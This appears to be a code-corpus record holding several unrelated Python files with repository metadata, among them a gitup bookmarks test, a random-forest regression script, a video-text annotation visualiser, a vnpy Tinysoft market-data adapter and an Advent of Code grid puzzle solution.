:return: List of options contracts.
"""
url = "/v3/reference/options/contracts"
return self._paginate(
path=url,
params=self._get_params(self.list_options_contracts, locals()),
raw=raw,
deserializer=OptionsContract.from_dict,
)
| 0
| 21,145
| 161
|
3a917aec646616b14d05103f2a853a51a6359d7f
| 459
|
py
|
Python
|
gitup/test/test_bookmarks.py
|
hr157/git-repo-updater
|
4ad20a6979226bf066740287accc8239d82a89ec
|
[
"MIT"
] | 772
|
2015-01-17T09:11:07.000Z
|
2022-03-23T08:50:31.000Z
|
gitup/test/test_bookmarks.py
|
hr157/git-repo-updater
|
4ad20a6979226bf066740287accc8239d82a89ec
|
[
"MIT"
] | 50
|
2015-03-12T14:33:51.000Z
|
2022-03-10T07:58:54.000Z
|
gitup/test/test_bookmarks.py
|
hr157/git-repo-updater
|
4ad20a6979226bf066740287accc8239d82a89ec
|
[
"MIT"
] | 110
|
2015-01-30T07:27:23.000Z
|
2021-12-15T07:22:20.000Z
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011-2018 Ben Kurtovic <ben.kurtovic@gmail.com>
# Released under the terms of the MIT License. See LICENSE for details.
from __future__ import print_function, unicode_literals
from gitup import config
| 30.6
| 71
| 0.736383
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011-2018 Ben Kurtovic <ben.kurtovic@gmail.com>
# Released under the terms of the MIT License. See LICENSE for details.
from __future__ import print_function, unicode_literals
from gitup import config
def test_empty_list(tmpdir, capsys):
config_path = tmpdir / "config"
config.list_bookmarks(config_path)
captured = capsys.readouterr()
assert captured.out == "You have no bookmarks to display.\n"
| 190
| 0
| 23
|
8d619e7f57b45654b3e4b1e082e471adaafd8081
| 596
|
py
|
Python
|
benchmark/matrix_product.py
|
xu3kev/bril
|
7d21628621b584e1ec09b3960bf9909276ba7f25
|
[
"MIT"
] | null | null | null |
benchmark/matrix_product.py
|
xu3kev/bril
|
7d21628621b584e1ec09b3960bf9909276ba7f25
|
[
"MIT"
] | null | null | null |
benchmark/matrix_product.py
|
xu3kev/bril
|
7d21628621b584e1ec09b3960bf9909276ba7f25
|
[
"MIT"
] | null | null | null |
from cg import *
from random import randint
cg = CG()
n=20
c = [[Var("int") for i in range(n)] for i in range(n)]
a = [[Var("int") for i in range(n)] for i in range(n)]
b = [[Var("int") for i in range(n)] for i in range(n)]
m=100
for vs in a:
for v in vs:
cg.init(v, randint(0,m))
for vs in b:
for v in vs:
cg.init(v, randint(0,m))
for i in range(n):
for j in range(n):
cg.init(c[i][j], 0)
for k in range(n):
tmp = Var("int")
cg.op_mul(tmp, a[i][k], b[k][j])
cg.op_add(c[i][j], c[i][j], tmp)
cg.print_code()
| 19.225806
| 54
| 0.510067
|
from cg import *
from random import randint
cg = CG()
n=20
c = [[Var("int") for i in range(n)] for i in range(n)]
a = [[Var("int") for i in range(n)] for i in range(n)]
b = [[Var("int") for i in range(n)] for i in range(n)]
m=100
for vs in a:
for v in vs:
cg.init(v, randint(0,m))
for vs in b:
for v in vs:
cg.init(v, randint(0,m))
for i in range(n):
for j in range(n):
cg.init(c[i][j], 0)
for k in range(n):
tmp = Var("int")
cg.op_mul(tmp, a[i][k], b[k][j])
cg.op_add(c[i][j], c[i][j], tmp)
cg.print_code()
| 0
| 0
| 0
|
d00adb83565673cb264520ebee0b3eda48e2f0c5
| 2,523
|
py
|
Python
|
weighted_mean_prediction/random_forest/tuned_rf_model.py
|
fegb-dataset22/dataset22
|
6642a01ca7ab9948c9b5ffc3aae1201cd8c72f0b
|
[
"MIT"
] | null | null | null |
weighted_mean_prediction/random_forest/tuned_rf_model.py
|
fegb-dataset22/dataset22
|
6642a01ca7ab9948c9b5ffc3aae1201cd8c72f0b
|
[
"MIT"
] | null | null | null |
weighted_mean_prediction/random_forest/tuned_rf_model.py
|
fegb-dataset22/dataset22
|
6642a01ca7ab9948c9b5ffc3aae1201cd8c72f0b
|
[
"MIT"
] | null | null | null |
import os.path
from typing import Dict
import matplotlib.pyplot as plt
import pandas as pd
from sklearn import metrics
from sklearn.ensemble import RandomForestRegressor
from hyperparameter_tuning.study_functions import load_study
from root import ROOT_DIR
from weighted_mean_prediction.data_setup import get_encoded_split_data
from weighted_mean_prediction.model_storage import load_model, save_model
from weighted_mean_prediction.regression_performance import plot_rf_feature_importances
if __name__ == "__main__":
study_dir = f"{ROOT_DIR}/weighted_mean_prediction/random_forest/studies"
study_name = f"rf_study2.joblib"
study_path = os.path.join(study_dir, study_name)
model_name = "rf2.joblib"
model_path = f"{ROOT_DIR}/weighted_mean_prediction/random_forest/models/{model_name}"
X_train, X_val, X_test, y_train, y_val, y_test = get_encoded_split_data()
X_train = pd.concat([X_train, X_val])
y_train = pd.concat([y_train, y_val])
study = load_study(study_path)
rf: RandomForestRegressor = load_model(model_path)
if rf is None:
rf = train_tuned_model(study.best_params, X_train, y_train["weighted_mean"], model_path)
else:
if not is_same_params(study.best_params, rf.get_params()):
rf = train_tuned_model(study.best_params, X_train, y_train["weighted_mean"], model_path)
train_acc = rf.score(X_train, y_train)
test_acc = rf.score(X_test, y_test)
print(train_acc, test_acc)
for idx, importance in enumerate(rf.feature_importances_):
print(f"{X_train.columns[idx]} : {importance}")
# plot_rf_feature_importances(rf.feature_importances_)
predictions = rf.predict(X_test)
mape = metrics.mean_absolute_percentage_error(predictions, y_test)
mse = metrics.mean_squared_error(predictions, y_test)
print("\nMAPE = ", mape)
print("MSE = ", mse)
plt.scatter(range(len(predictions[:100])), predictions[:100])
plt.scatter(range(len(y_test[:100])), y_test[:100])
plt.show()
| 37.656716
| 100
| 0.738407
|
import os.path
from typing import Dict
import matplotlib.pyplot as plt
import pandas as pd
from sklearn import metrics
from sklearn.ensemble import RandomForestRegressor
from hyperparameter_tuning.study_functions import load_study
from root import ROOT_DIR
from weighted_mean_prediction.data_setup import get_encoded_split_data
from weighted_mean_prediction.model_storage import load_model, save_model
from weighted_mean_prediction.regression_performance import plot_rf_feature_importances
def is_same_params(study_params: Dict[str, object],
model_params: Dict[str, object]) -> bool:
return all([study_params[p] == model_params[p] for p in study_params.keys()])
def train_tuned_model(model_params: Dict[str, object], X_train: pd.DataFrame, y_train: pd.DataFrame,
file_path: str) -> RandomForestRegressor:
model = RandomForestRegressor(**model_params, random_state=0)
model.fit(X_train, y_train)
save_model(model, file_path)
return model
if __name__ == "__main__":
study_dir = f"{ROOT_DIR}/weighted_mean_prediction/random_forest/studies"
study_name = f"rf_study2.joblib"
study_path = os.path.join(study_dir, study_name)
model_name = "rf2.joblib"
model_path = f"{ROOT_DIR}/weighted_mean_prediction/random_forest/models/{model_name}"
X_train, X_val, X_test, y_train, y_val, y_test = get_encoded_split_data()
X_train = pd.concat([X_train, X_val])
y_train = pd.concat([y_train, y_val])
study = load_study(study_path)
rf: RandomForestRegressor = load_model(model_path)
if rf is None:
rf = train_tuned_model(study.best_params, X_train, y_train["weighted_mean"], model_path)
else:
if not is_same_params(study.best_params, rf.get_params()):
rf = train_tuned_model(study.best_params, X_train, y_train["weighted_mean"], model_path)
train_acc = rf.score(X_train, y_train)
test_acc = rf.score(X_test, y_test)
print(train_acc, test_acc)
for idx, importance in enumerate(rf.feature_importances_):
print(f"{X_train.columns[idx]} : {importance}")
# plot_rf_feature_importances(rf.feature_importances_)
predictions = rf.predict(X_test)
mape = metrics.mean_absolute_percentage_error(predictions, y_test)
mse = metrics.mean_squared_error(predictions, y_test)
print("\nMAPE = ", mape)
print("MSE = ", mse)
plt.scatter(range(len(predictions[:100])), predictions[:100])
plt.scatter(range(len(y_test[:100])), y_test[:100])
plt.show()
| 464
| 0
| 46
|
0278f07d5c4fcf43dea6388a703c9cfa378a80f3
| 4,464
|
py
|
Python
|
Evaluation_Protocol/Task2_VideoTextSpotting/utils/Annotation_Deal/vis.py
|
weijiawu/BOVText-Benchmark
|
375cc1c72e20fb751e17a33c74fc4ca5c1557389
|
[
"CC-BY-4.0"
] | 24
|
2021-10-12T04:02:31.000Z
|
2022-03-31T07:19:17.000Z
|
Evaluation_Protocol/Task2_VideoTextSpotting/utils/Annotation_Deal/vis.py
|
maoxiaofei99/BOVText-Benchmark
|
880342867704f8be78fb8f8e1615a234a287a574
|
[
"CC-BY-4.0"
] | 1
|
2021-10-12T04:06:14.000Z
|
2021-10-12T04:06:14.000Z
|
Evaluation_Protocol/Task2_VideoTextSpotting/utils/Annotation_Deal/vis.py
|
maoxiaofei99/BOVText-Benchmark
|
880342867704f8be78fb8f8e1615a234a287a574
|
[
"CC-BY-4.0"
] | 5
|
2021-11-29T05:18:36.000Z
|
2022-02-27T02:22:47.000Z
|
# -*- coding: utf-8 -*-
import cv2
import os
import copy
import numpy as np
import math
# import Levenshtein
from cv2 import VideoWriter, VideoWriter_fourcc
import json
from tqdm import tqdm
from PIL import Image, ImageDraw, ImageFont
import shutil
def Frames2Video(frames_dir=""):
''' 将frames_dir下面的所有视频帧合成一个视频 '''
img_root = frames_dir #'E:\\KSText\\videos_frames\\video_14_6'
image = cv2.imread(os.path.join(img_root,"1.jpg"))
h,w,_ = image.shape
out_root = frames_dir+".avi"
# Edit each frame's appearing time!
fps = 20
fourcc = VideoWriter_fourcc(*"MJPG") # 支持jpg
videoWriter = cv2.VideoWriter(out_root, fourcc, fps, (w, h))
im_names = os.listdir(img_root)
num_frames = len(im_names)
print(len(im_names))
for im_name in tqdm(range(1, num_frames+1)):
string = os.path.join( img_root, str(im_name) + '.jpg')
# print(string)
frame = cv2.imread(string)
# frame = cv2.resize(frame, (w, h))
videoWriter.write(frame)
videoWriter.release()
shutil.rmtree(img_root)
if __name__ == "__main__":
root = "/home/guoxiaofeng/.jupyter/wuweijia/VideoTextSpotting/MMVText_20S/New_Add/Video_Frame"
json_root = "/home/guoxiaofeng/.jupyter/wuweijia/VideoTextSpotting/MMVText_20S/New_Add/Annotation"
result_path_cls = "./vis"
seqs = ["48901770165" , "49004756658" , "49287498737", "49424491900", "49466537994", "49552222543","49983613955","Cls18_1","Cls26_1","demo"]
for video_name in tqdm(os.listdir(json_root)):
annotation_path_ = os.path.join(json_root, video_name)
video_path_ = os.path.join(root, video_name.split(".json")[0])
annotation = get_annotation(annotation_path_)
if video_name.split(".json")[0] in seqs:
continue
result_path_cls_video = os.path.join(result_path_cls, video_name.split(".json")[0])
if not os.path.exists(result_path_cls_video):
os.makedirs(result_path_cls_video)
else:
continue
for frame_id in annotation.keys():
frame_name = video_name.split(".json")[0] + "_" + frame_id.zfill(6) + ".jpg"
frame_path = os.path.join(video_path_,frame_name)
frame = cv2.imread(frame_path)
# print(frame_path)
annotatation_frame = annotation[frame_id]
for data in annotatation_frame:
x1,y1,x2,y2,x3,y3,x4,y4,ID, content,is_caption = data
# print(data)
id_content = str(content) + " " + str(ID)
# print(id_content)
# print(frame.shape)
if is_caption == "scene":
points = np.array([[x1, y1], [x2, y2], [x3, y3], [x4, y4]], np.int32)
cv2.polylines(frame, [points], True, (0, 0, 255), thickness=3)
frame=cv2AddChineseText(frame,id_content, (int(x1), int(y1) - 20),(0, 255, 0), 45)
else:
points = np.array([[x1, y1], [x2, y2], [x3, y3], [x4, y4]], np.int32)
cv2.polylines(frame, [points], True, (0, 255, 0), thickness=3)
frame=cv2AddChineseText(frame,id_content, (int(x1), int(y1) - 20),(0, 255, 0), 45)
# if not os.path.exists(result_path):
# os.makedirs(result_path)
frame_vis_path = os.path.join(result_path_cls_video, frame_id+".jpg")
cv2.imwrite(frame_vis_path, frame)
# video_vis_path = "./"
Frames2Video(frames_dir=result_path_cls_video)
# break
# break
| 35.428571
| 144
| 0.600582
|
# -*- coding: utf-8 -*-
import cv2
import os
import copy
import numpy as np
import math
# import Levenshtein
from cv2 import VideoWriter, VideoWriter_fourcc
import json
from tqdm import tqdm
from PIL import Image, ImageDraw, ImageFont
import shutil
def Frames2Video(frames_dir=""):
''' 将frames_dir下面的所有视频帧合成一个视频 '''
img_root = frames_dir #'E:\\KSText\\videos_frames\\video_14_6'
image = cv2.imread(os.path.join(img_root,"1.jpg"))
h,w,_ = image.shape
out_root = frames_dir+".avi"
# Edit each frame's appearing time!
fps = 20
fourcc = VideoWriter_fourcc(*"MJPG") # 支持jpg
videoWriter = cv2.VideoWriter(out_root, fourcc, fps, (w, h))
im_names = os.listdir(img_root)
num_frames = len(im_names)
print(len(im_names))
for im_name in tqdm(range(1, num_frames+1)):
string = os.path.join( img_root, str(im_name) + '.jpg')
# print(string)
frame = cv2.imread(string)
# frame = cv2.resize(frame, (w, h))
videoWriter.write(frame)
videoWriter.release()
shutil.rmtree(img_root)
def get_annotation(video_path):
annotation = {}
with open(video_path,'r',encoding='utf-8-sig') as load_f:
gt = json.load(load_f)
for child in gt:
lines = gt[child]
annotation.update({child:lines})
return annotation
def cv2AddChineseText(img, text, position, textColor=(0, 255, 0), textSize=30):
if (isinstance(img, np.ndarray)): # 判断是否OpenCV图片类型
img = Image.fromarray(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
# 创建一个可以在给定图像上绘图的对象
draw = ImageDraw.Draw(img)
# 字体的格式
fontStyle = ImageFont.truetype(
"./simsun.ttc", textSize, encoding="utf-8")
# 绘制文本
draw.text(position, text, textColor, font=fontStyle)
# 转换回OpenCV格式
return cv2.cvtColor(np.asarray(img), cv2.COLOR_RGB2BGR)
if __name__ == "__main__":
root = "/home/guoxiaofeng/.jupyter/wuweijia/VideoTextSpotting/MMVText_20S/New_Add/Video_Frame"
json_root = "/home/guoxiaofeng/.jupyter/wuweijia/VideoTextSpotting/MMVText_20S/New_Add/Annotation"
result_path_cls = "./vis"
seqs = ["48901770165" , "49004756658" , "49287498737", "49424491900", "49466537994", "49552222543","49983613955","Cls18_1","Cls26_1","demo"]
for video_name in tqdm(os.listdir(json_root)):
annotation_path_ = os.path.join(json_root, video_name)
video_path_ = os.path.join(root, video_name.split(".json")[0])
annotation = get_annotation(annotation_path_)
if video_name.split(".json")[0] in seqs:
continue
result_path_cls_video = os.path.join(result_path_cls, video_name.split(".json")[0])
if not os.path.exists(result_path_cls_video):
os.makedirs(result_path_cls_video)
else:
continue
for frame_id in annotation.keys():
frame_name = video_name.split(".json")[0] + "_" + frame_id.zfill(6) + ".jpg"
frame_path = os.path.join(video_path_,frame_name)
frame = cv2.imread(frame_path)
# print(frame_path)
annotatation_frame = annotation[frame_id]
for data in annotatation_frame:
x1,y1,x2,y2,x3,y3,x4,y4,ID, content,is_caption = data
# print(data)
id_content = str(content) + " " + str(ID)
# print(id_content)
# print(frame.shape)
if is_caption == "scene":
points = np.array([[x1, y1], [x2, y2], [x3, y3], [x4, y4]], np.int32)
cv2.polylines(frame, [points], True, (0, 0, 255), thickness=3)
frame=cv2AddChineseText(frame,id_content, (int(x1), int(y1) - 20),(0, 255, 0), 45)
else:
points = np.array([[x1, y1], [x2, y2], [x3, y3], [x4, y4]], np.int32)
cv2.polylines(frame, [points], True, (0, 255, 0), thickness=3)
frame=cv2AddChineseText(frame,id_content, (int(x1), int(y1) - 20),(0, 255, 0), 45)
# if not os.path.exists(result_path):
# os.makedirs(result_path)
frame_vis_path = os.path.join(result_path_cls_video, frame_id+".jpg")
cv2.imwrite(frame_vis_path, frame)
# video_vis_path = "./"
Frames2Video(frames_dir=result_path_cls_video)
# break
# break
| 803
| 0
| 50
|
132e0421e9b24a450962f82bb4efb1ae59d84d80
| 5,814
|
py
|
Python
|
vnpy_tinysoft/tinysoft_datafeed.py
|
noranhe/vnpy_tinysoft
|
aaa00679adf93b40710e03113411adc24a98a038
|
[
"MIT"
] | null | null | null |
vnpy_tinysoft/tinysoft_datafeed.py
|
noranhe/vnpy_tinysoft
|
aaa00679adf93b40710e03113411adc24a98a038
|
[
"MIT"
] | 1
|
2021-10-30T05:32:06.000Z
|
2021-11-01T11:36:15.000Z
|
vnpy_tinysoft/tinysoft_datafeed.py
|
vnpy/vnpy_tinysoft
|
0d97a91251c02f1b2a7e4afd707a2157056605c6
|
[
"MIT"
] | null | null | null |
from datetime import datetime, timedelta
from typing import Dict, List, Optional
from pytz import timezone
from vnpy.trader.setting import SETTINGS
from vnpy.trader.constant import Exchange, Interval
from vnpy.trader.object import BarData, TickData, HistoryRequest
from vnpy.trader.utility import extract_vt_symbol
from vnpy.trader.datafeed import BaseDatafeed
from .pyTSL import Client, DoubleToDatetime
EXCHANGE_MAP: Dict[Exchange, str] = {
Exchange.SSE: "SH",
Exchange.SZSE: "SZ"
}
INTERVAL_MAP: Dict[Interval, str] = {
Interval.MINUTE: "cy_1m",
Interval.HOUR: "cy_60m",
Interval.DAILY: "cy_day",
}
SHIFT_MAP: Dict[Interval, timedelta] = {
Interval.MINUTE: timedelta(minutes=1),
Interval.HOUR: timedelta(hours=1),
}
CHINA_TZ = timezone("Asia/Shanghai")
class TinysoftDatafeed(BaseDatafeed):
"""天软数据服务接口"""
def __init__(self):
""""""
self.username: str = SETTINGS["datafeed.username"]
self.password: str = SETTINGS["datafeed.password"]
self.client: Client = None
self.inited: bool = False
def init(self) -> bool:
"""初始化"""
if self.inited:
return True
self.client = Client(
self.username,
self.password,
"tsl.tinysoft.com.cn",
443
)
n: int = self.client.login()
if n != 1:
return False
self.inited = True
return True
def query_bar_history(self, req: HistoryRequest) -> Optional[List[BarData]]:
"""查询K线数据"""
if not self.inited:
self.init()
symbol, exchange = extract_vt_symbol(req.vt_symbol)
tsl_exchange: str = EXCHANGE_MAP.get(exchange, "")
tsl_interval: str = INTERVAL_MAP[req.interval]
bars: List[BarData] = []
start_str: str = req.start.strftime("%Y%m%d")
end_str: str = req.end.strftime("%Y%m%d")
cmd: str = (
f"setsysparam(pn_cycle(),{tsl_interval}());"
"return select * from markettable "
f"datekey {start_str}T to {end_str}T "
f"of '{tsl_exchange}{symbol}' end;"
)
result = self.client.exec(cmd)
if not result.error():
data = result.value()
shift: timedelta = SHIFT_MAP.get(req.interval, None)
for d in data:
dt: datetime = DoubleToDatetime(d["date"])
if shift:
dt -= shift
bar: BarData = BarData(
symbol=symbol,
exchange=exchange,
datetime=CHINA_TZ.localize(dt),
interval=req.interval,
open_price=d["open"],
high_price=d["high"],
low_price=d["low"],
close_price=d["close"],
volume=d["vol"],
turnover=d["amount"],
gateway_name="TSL"
)
# 期货则获取持仓量字段
if not tsl_exchange:
bar.open_interest = d["sectional_cjbs"]
bars.append(bar)
return bars
def query_tick_history(self, req: HistoryRequest) -> Optional[List[TickData]]:
"""查询Tick数据"""
if not self.inited:
self.init()
symbol, exchange = extract_vt_symbol(req.vt_symbol)
tsl_exchange: str = EXCHANGE_MAP.get(exchange, "")
ticks: List[TickData] = []
dt: datetime = req.start
while dt <= req.end:
date_str: str = dt.strftime("%Y%m%d")
cmd: str = f"return select * from tradetable datekey {date_str}T to {date_str}T+16/24 of '{tsl_exchange}{symbol}' end ; "
result = self.client.exec(cmd)
if not result.error():
data = result.value()
for d in data:
dt: datetime = DoubleToDatetime(d["date"])
dt: datetime = CHINA_TZ.localize(dt)
tick: TickData = TickData(
symbol=symbol,
exchange=exchange,
name=d["StockName"],
datetime=dt,
open_price=d["sectional_open"],
high_price=d["sectional_high"],
low_price=d["sectional_low"],
last_price=d["price"],
volume=d["sectional_vol"],
turnover=d["sectional_amount"],
bid_price_1=d["buy1"],
bid_price_2=d["buy2"],
bid_price_3=d["buy3"],
bid_price_4=d["buy4"],
bid_price_5=d["buy5"],
ask_price_1=d["sale1"],
ask_price_2=d["sale2"],
ask_price_3=d["sale3"],
ask_price_4=d["sale4"],
ask_price_5=d["sale5"],
bid_volume_1=d["bc1"],
bid_volume_2=d["bc2"],
bid_volume_3=d["bc3"],
bid_volume_4=d["bc4"],
bid_volume_5=d["bc5"],
ask_volume_1=d["sc1"],
ask_volume_2=d["sc2"],
ask_volume_3=d["sc3"],
ask_volume_4=d["sc4"],
ask_volume_5=d["sc5"],
localtime=dt,
gateway_name="TSL"
)
# 期货则获取持仓量字段
if not tsl_exchange:
tick.open_interest = d["sectional_cjbs"]
ticks.append(tick)
dt += timedelta(days=1)
return ticks
| 31.945055
| 133
| 0.491916
|
from datetime import datetime, timedelta
from typing import Dict, List, Optional
from pytz import timezone
from vnpy.trader.setting import SETTINGS
from vnpy.trader.constant import Exchange, Interval
from vnpy.trader.object import BarData, TickData, HistoryRequest
from vnpy.trader.utility import extract_vt_symbol
from vnpy.trader.datafeed import BaseDatafeed
from .pyTSL import Client, DoubleToDatetime
EXCHANGE_MAP: Dict[Exchange, str] = {
Exchange.SSE: "SH",
Exchange.SZSE: "SZ"
}
INTERVAL_MAP: Dict[Interval, str] = {
Interval.MINUTE: "cy_1m",
Interval.HOUR: "cy_60m",
Interval.DAILY: "cy_day",
}
SHIFT_MAP: Dict[Interval, timedelta] = {
Interval.MINUTE: timedelta(minutes=1),
Interval.HOUR: timedelta(hours=1),
}
CHINA_TZ = timezone("Asia/Shanghai")
class TinysoftDatafeed(BaseDatafeed):
"""天软数据服务接口"""
def __init__(self):
""""""
self.username: str = SETTINGS["datafeed.username"]
self.password: str = SETTINGS["datafeed.password"]
self.client: Client = None
self.inited: bool = False
def init(self) -> bool:
"""初始化"""
if self.inited:
return True
self.client = Client(
self.username,
self.password,
"tsl.tinysoft.com.cn",
443
)
n: int = self.client.login()
if n != 1:
return False
self.inited = True
return True
def query_bar_history(self, req: HistoryRequest) -> Optional[List[BarData]]:
"""查询K线数据"""
if not self.inited:
self.init()
symbol, exchange = extract_vt_symbol(req.vt_symbol)
tsl_exchange: str = EXCHANGE_MAP.get(exchange, "")
tsl_interval: str = INTERVAL_MAP[req.interval]
bars: List[BarData] = []
start_str: str = req.start.strftime("%Y%m%d")
end_str: str = req.end.strftime("%Y%m%d")
cmd: str = (
f"setsysparam(pn_cycle(),{tsl_interval}());"
"return select * from markettable "
f"datekey {start_str}T to {end_str}T "
f"of '{tsl_exchange}{symbol}' end;"
)
result = self.client.exec(cmd)
if not result.error():
data = result.value()
shift: timedelta = SHIFT_MAP.get(req.interval, None)
for d in data:
dt: datetime = DoubleToDatetime(d["date"])
if shift:
dt -= shift
bar: BarData = BarData(
symbol=symbol,
exchange=exchange,
datetime=CHINA_TZ.localize(dt),
interval=req.interval,
open_price=d["open"],
high_price=d["high"],
low_price=d["low"],
close_price=d["close"],
volume=d["vol"],
turnover=d["amount"],
gateway_name="TSL"
)
# 期货则获取持仓量字段
if not tsl_exchange:
bar.open_interest = d["sectional_cjbs"]
bars.append(bar)
return bars
def query_tick_history(self, req: HistoryRequest) -> Optional[List[TickData]]:
"""查询Tick数据"""
if not self.inited:
self.init()
symbol, exchange = extract_vt_symbol(req.vt_symbol)
tsl_exchange: str = EXCHANGE_MAP.get(exchange, "")
ticks: List[TickData] = []
dt: datetime = req.start
while dt <= req.end:
date_str: str = dt.strftime("%Y%m%d")
cmd: str = f"return select * from tradetable datekey {date_str}T to {date_str}T+16/24 of '{tsl_exchange}{symbol}' end ; "
result = self.client.exec(cmd)
if not result.error():
data = result.value()
for d in data:
dt: datetime = DoubleToDatetime(d["date"])
dt: datetime = CHINA_TZ.localize(dt)
tick: TickData = TickData(
symbol=symbol,
exchange=exchange,
name=d["StockName"],
datetime=dt,
open_price=d["sectional_open"],
high_price=d["sectional_high"],
low_price=d["sectional_low"],
last_price=d["price"],
volume=d["sectional_vol"],
turnover=d["sectional_amount"],
bid_price_1=d["buy1"],
bid_price_2=d["buy2"],
bid_price_3=d["buy3"],
bid_price_4=d["buy4"],
bid_price_5=d["buy5"],
ask_price_1=d["sale1"],
ask_price_2=d["sale2"],
ask_price_3=d["sale3"],
ask_price_4=d["sale4"],
ask_price_5=d["sale5"],
bid_volume_1=d["bc1"],
bid_volume_2=d["bc2"],
bid_volume_3=d["bc3"],
bid_volume_4=d["bc4"],
bid_volume_5=d["bc5"],
ask_volume_1=d["sc1"],
ask_volume_2=d["sc2"],
ask_volume_3=d["sc3"],
ask_volume_4=d["sc4"],
ask_volume_5=d["sc5"],
localtime=dt,
gateway_name="TSL"
)
# 期货则获取持仓量字段
if not tsl_exchange:
tick.open_interest = d["sectional_cjbs"]
ticks.append(tick)
dt += timedelta(days=1)
return ticks
| 0
| 0
| 0
|
e2d1dcb2354936fd158943bcf5fefb6597f1fd28
| 1,203
|
py
|
Python
|
d8.py
|
sdamashek/adventofcode
|
68b50d16246657313ce491b1b1b047e743f687fa
|
[
"Unlicense"
] | null | null | null |
d8.py
|
sdamashek/adventofcode
|
68b50d16246657313ce491b1b1b047e743f687fa
|
[
"Unlicense"
] | null | null | null |
d8.py
|
sdamashek/adventofcode
|
68b50d16246657313ce491b1b1b047e743f687fa
|
[
"Unlicense"
] | null | null | null |
inp = open('input_d8.txt').read()
arr = [[0 for i in range(50)] for j in range(6)]
for i in inp.split('\n')[:-1]:
if i.startswith('rotate row'):
rotaterow(int(i.split('y=')[1].split(' ')[0]), int(i.split('by ')[1]))
elif i.startswith('rotate column'):
print(i)
rotatecol(int(i.split('x=')[1].split(' ')[0]), int(i.split('by ')[1]))
else:
rect(int(i.split(' ')[1].split('x')[0]), int(i.split('x')[1]))
print(arr)
print(countpixels())
for i in arr:
print(' '.join(map(str,i)))
| 23.134615
| 78
| 0.47714
|
inp = open('input_d8.txt').read()
arr = [[0 for i in range(50)] for j in range(6)]
def rect(x,y):
global arr
for i in range(x):
for j in range(y):
print(i,j)
arr[j][i] = 1
def rotatecol(x,n):
global arr
for _ in range(n):
first = arr[5][x]
for i in range(5,0,-1):
arr[i][x] = arr[i-1][x]
arr[0][x] = first
print(arr)
def rotaterow(y,n):
global arr
for _ in range(n):
first = arr[y][49]
for i in range(49,0,-1):
arr[y][i] = arr[y][i-1]
arr[y][0] = first
print(arr)
def countpixels():
c = 0
for i in range(50):
for j in range(6):
if arr[j][i] == 1:
c += 1
return c
for i in inp.split('\n')[:-1]:
if i.startswith('rotate row'):
rotaterow(int(i.split('y=')[1].split(' ')[0]), int(i.split('by ')[1]))
elif i.startswith('rotate column'):
print(i)
rotatecol(int(i.split('x=')[1].split(' ')[0]), int(i.split('by ')[1]))
else:
rect(int(i.split(' ')[1].split('x')[0]), int(i.split('x')[1]))
print(arr)
print(countpixels())
for i in arr:
print(' '.join(map(str,i)))
| 584
| 0
| 92
|